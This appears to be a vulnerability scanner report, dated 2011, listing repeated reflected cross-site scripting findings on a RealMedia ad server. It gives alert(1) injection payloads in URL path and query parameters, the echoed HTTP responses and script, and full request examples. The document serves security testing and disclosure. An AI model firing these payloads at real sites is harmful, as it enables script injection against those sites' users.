The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f2d"><script>alert(1)</script>d7bc9b80311 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:13 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9045f"><script>alert(1)</script>191b65027bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 390 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:18 GMT;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b28"><script>alert(1)</script>8928d95ff49 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:57 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c040"><script>alert(1)</script>f6f1f1a114a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 258 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:02 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d3d"><script>alert(1)</script>dfdf641f922 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:07 GMT;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc57"><script>alert(1)</script>fcf943483cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:53 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e813"><script>alert(1)</script>f6bfea0e9d7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:56 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a286c"><script>alert(1)</script>b1305f9c9bc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:04 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61eca"-alert(1)-"11fefb1e2e5 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:46 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 580 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:49 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "61eca"-alert(1)-"11fefb1e2e5"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bc9"><script>alert(1)</script>a17d56d34d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31127"><script>alert(1)</script>5274148795f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 258 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:03 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e11df"><script>alert(1)</script>5466936ca41 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 390 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf6c"><script>alert(1)</script>7f5cada5b68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 398 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:28 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d5d"><script>alert(1)</script>38bef79c455 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><script>alert(1)</script>7b109254dda was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 390 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de561"-alert(1)-"681c7535723 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:46:30 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1R10M5b|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:32 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "101155000010000511001de561"-alert(1)-"681c7535723"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e57b0"><script>alert(1)</script>f90cf47e664 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:24 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44397"><script>alert(1)</script>fa6f22d1dba was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:29 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90c5"><script>alert(1)</script>c13f5dc77c7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:34 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8130"-alert(1)-"538826cf67a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:46:59 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|R10M5i|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:01 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "101155000010000511001a8130"-alert(1)-"538826cf67a"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6267"><script>alert(1)</script>8e69d18030e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc91"><script>alert(1)</script>55a85194b52 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 260 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398f7"><script>alert(1)</script>09622cac1b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 390 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:01 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab3a"-alert(1)-"65a69611e7a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:46 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:48 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "1011550000100005110018ab3a"-alert(1)-"65a69611e7a"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fa55"><script>alert(1)</script>2cda01ab3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:03 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a984"><script>alert(1)</script>4173fc658aa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:08 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a322"><script>alert(1)</script>341cdb21cb0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:13 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12776"-alert(1)-"7163b7e534f was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:46:52 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|O10M5l|R10M5p|R10M5x|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:54 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "10115500001000051100112776"-alert(1)-"7163b7e534f"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59ab"><script>alert(1)</script>b4e2983415 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediaf59ab"><script>alert(1)</script>b4e2983415/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 396 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:09 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6b6"><script>alert(1)</script>1d151c1f552 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securecf6b6"><script>alert(1)</script>1d151c1f552/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:14 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453af"><script>alert(1)</script>99c2aff247f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
